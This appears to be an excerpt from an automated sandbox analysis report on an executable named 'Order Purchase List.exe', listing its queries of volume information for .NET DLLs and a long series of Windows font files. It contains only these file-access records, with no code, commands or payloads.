Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
